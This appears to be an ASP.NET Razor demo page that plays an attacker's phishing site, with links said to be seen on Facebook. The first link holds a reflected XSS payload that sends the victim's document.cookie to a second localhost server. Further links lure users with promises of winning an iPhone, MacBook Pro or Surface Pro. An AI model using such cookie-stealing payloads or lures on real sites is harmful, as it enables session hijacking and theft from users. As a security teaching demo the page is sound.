
    <h1>Attacking website </h1>
    <h3>假設以下是在 FB 看到的 Links</h3>
    <ul class="list-group">
        <li class="list-group-item list-group-item-danger"><a href="http://localhost:44375/?searchTerm=');location.href='http://localhost:53441/cookies/?c='%2BencodeURIComponent(document.cookie);//">查詢產品</a></li>
        <li class="list-group-item list-group-item-success">@Html.ActionLink("想要贏得 Iphone 嗎?", "Index", "WinIphone")</li>
        <li class="list-group-item list-group-item-info">@Html.ActionLink("想要贏得 MacBook Pro 嗎?", "Index", "WinMacPro")</li>
        <li class="list-group-item list-group-item-warning">@Html.ActionLink("想要贏得 Surface Pro 嗎?", "Index", "WinSurfacePro")</li>
    </ul> 

